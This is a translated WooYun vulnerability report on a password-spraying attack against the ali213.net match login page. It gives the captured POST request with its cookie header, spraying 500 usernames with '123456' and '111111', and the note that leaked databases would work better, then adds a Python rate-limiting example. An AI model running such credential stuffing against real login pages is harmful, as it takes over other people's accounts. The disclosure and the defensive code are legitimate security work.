WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-07-15: Details sent to the vendor, awaiting vendor handling
2015-07-15: Vendor confirmed; details disclosed to the vendor only
2015-07-25: Details disclosed to core white hats and experts in the relevant field
2015-08-04: Details disclosed to regular white hats
2015-08-14: Details disclosed to intern white hats
2015-08-29: Details disclosed to the public
I want to redeem the 3k shopping card from the marketplace, so please give this a high rank!
http://pk.match.ali213.net/login?id=1
The page says you can log in with a 游侠网 account, so I registered an account on the main forum. Logged in successfully. Captured the request. Started credential stuffing.
POST /login?id=1 HTTP/1.1
Host: pk.match.ali213.net
Proxy-Connection: keep-alive
Content-Length: 64
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://pk.match.ali213.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36
HTTPS: 1
Content-Type: application/x-www-form-urlencoded
Referer: http://pk.match.ali213.net/login?id=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=pnatk5mdvd42rbcn54vr6e57k5; zdinfo=a%3A9%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22name%22%3Bs%3A6%3A%22%E8%8B%8F%E5%AE%81%22%3Bs%3A3%3A%22pic%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22status%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22uid%22%3Bs%3A7%3A%225048685%22%3Bs%3A4%3A%22bkqz%22%3Bs%3A12%3A%22%E3%80%90%E6%B4%BB%E5%8A%A8%E3%80%91%22%3Bs%3A11%3A%22gameversion%22%3Bs%3A16%3A%22%E5%AE%9E%E5%86%B5%E8%B6%B3%E7%90%832008%22%3Bs%3A4%3A%22path%22%3Bs%3A6%3A%22suning%22%3Bs%3A5%3A%22pdate%22%3Bs%3A10%3A%221379844301%22%3B%7D; httpbor=%2Fsaichengs%3Fl%3D2%26id%3D2; CNZZDATA5464678=cnzz_eid%3D1915480331-1436940050-http%253A%252F%252Fpk.match.ali213.net%252F%26ntime%3D1436940050; CNZZDATA680195=cnzz_eid%3D2124363892-1436943884-http%253A%252F%252Fpk.match.ali213.net%252F%26ntime%3D1436943884; iLfW_98c8_noticeTitle=1; iLfW_98c8_saltkey=xeGfEG0q; iLfW_98c8_lastvisit=1436941010; iLfW_98c8_home_diymode=1; iLfW_98c8_sendmail=1; iLfW_98c8_sid=axR1y5; pgv_pvi=2462162432; pgv_info=ssi=s3193435950; Hm_lvt_2207c39aecfe7b9b0f144ab7f8316fad=1436944372; Hm_lpvt_2207c39aecfe7b9b0f144ab7f8316fad=1436944616; iLfW_98c8_seccodeSaxR1y50=d607MEyob7dn%2BYaeSjU5GDfrC2WH62r%2FilT6r7WJNHMkgKiWwZjXp0HynKEyQHLvzut%2FGuFol7ik7whHNL8; iLfW_98c8_lastact=1436944617%09forum.php%09ajax

LoginForm%5Busername%5D=§yxtest§&LoginForm%5Bpassword%5D=123456
Here I set the password to 123456 for every attempt and used the top 500 as the username list. In practice you could use a leaked database together with its passwords for credential stuffing, which would work even better.
A 302 means a successful login!
Out of 500, 20 succeeded with password 123456.
Out of 500, 20 succeeded with password 111111.
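An added example, not code from the original report or from the affected site: a sliding-window throttle per source IP and per account, the control whose absence lets a single client run 500 usernames against one password on /login?id=1 unchallenged. The limits, window, source IP and username list below are assumptions, and the "valid" set stands in for the real credential check.

```python
import time
from collections import defaultdict, deque


class LoginThrottle:
    """Sliding-window cap on login attempts per source IP and per account.
    Limits and window are assumed values, not taken from the report."""

    def __init__(self, per_ip=20, per_user=5, window=300):
        self.per_ip, self.per_user, self.window = per_ip, per_user, window
        self.by_ip = defaultdict(deque)    # ip -> timestamps of attempts
        self.by_user = defaultdict(deque)  # username -> timestamps of attempts

    def _prune(self, q, now):
        # Forget attempts that have aged out of the window.
        while q and now - q[0] >= self.window:
            q.popleft()

    def allowed(self, ip, username, now=None):
        """True if this attempt may proceed to the password check."""
        now = time.time() if now is None else now
        self._prune(self.by_ip[ip], now)
        self._prune(self.by_user[username], now)
        return (len(self.by_ip[ip]) < self.per_ip
                and len(self.by_user[username]) < self.per_user)

    def record(self, ip, username, now=None):
        """Count an attempt (success or failure) against both keys."""
        now = time.time() if now is None else now
        self.by_ip[ip].append(now)
        self.by_user[username].append(now)


def simulate_spray(usernames, valid, per_ip=20, now=0):
    """Replay a one-password spray of many usernames from one constructed
    source IP (203.0.113.7) and return (attempts_checked, hits).
    `valid` is the constructed set of accounts that use the sprayed password."""
    throttle = LoginThrottle(per_ip=per_ip)
    checked = hits = 0
    for user in usernames:
        if not throttle.allowed("203.0.113.7", user, now):
            continue  # rejected before the credential is ever compared
        throttle.record("203.0.113.7", user, now)
        checked += 1
        if user in valid:  # stands in for the real password check
            hits += 1
    return checked, hits
```

With the cap in place only the first 20 attempts from the source reach the credential check; without it all 500 do, which matches the 500-attempt runs shown above.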
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-07-15 16:57
Thank you very much.
None yet